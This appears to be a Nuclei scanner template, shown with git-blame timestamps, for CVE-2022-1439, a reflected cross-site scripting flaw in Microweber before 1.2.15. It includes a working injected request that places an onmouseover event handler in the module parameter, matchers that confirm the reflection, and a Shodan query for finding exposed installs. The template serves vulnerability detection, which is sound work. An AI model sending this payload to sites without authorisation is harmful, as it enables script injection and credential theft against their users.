2022-05-06 09:56:54 +00:00
id : CVE-2022-1439
info :
2022-09-16 19:50:10 +00:00
name : Microweber <1.2.15 - Cross-Site Scripting
2022-05-06 09:56:54 +00:00
author : pikpikcu
2022-09-16 20:03:07 +00:00
severity : medium
2022-09-16 19:50:10 +00:00
description : Microweber prior to 1.2.15 contains a reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2022-05-06 09:56:54 +00:00
reference :
- https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0/
2022-05-17 09:18:12 +00:00
- https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0
- https://github.com/microweber/microweber/commit/ad3928f67b2cd4443f4323d858b666d35a919ba8
2022-09-16 19:50:10 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-1439
2022-05-06 09:56:54 +00:00
classification :
2022-09-16 20:03:07 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-16 19:50:10 +00:00
cve-id : CVE-2022-1439
2022-09-16 20:03:07 +00:00
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
epss-score : 0.00078
2022-05-06 09:56:54 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-05-06 09:56:54 +00:00
shodan-query : http.favicon.hash:780351152
2022-08-27 04:41:18 +00:00
tags : cve,cve2022,microweber,xss,huntr
2022-05-06 09:56:54 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-05-06 09:56:54 +00:00
- method : GET
path :
- '{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}'
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
part : body
words :
- "<div class='x module module-'onmouseover=alert(document.domain) '"
- "parent-module-id"
condition : and
2022-09-16 19:50:10 +00:00
# Enhanced by md on 2022/09/12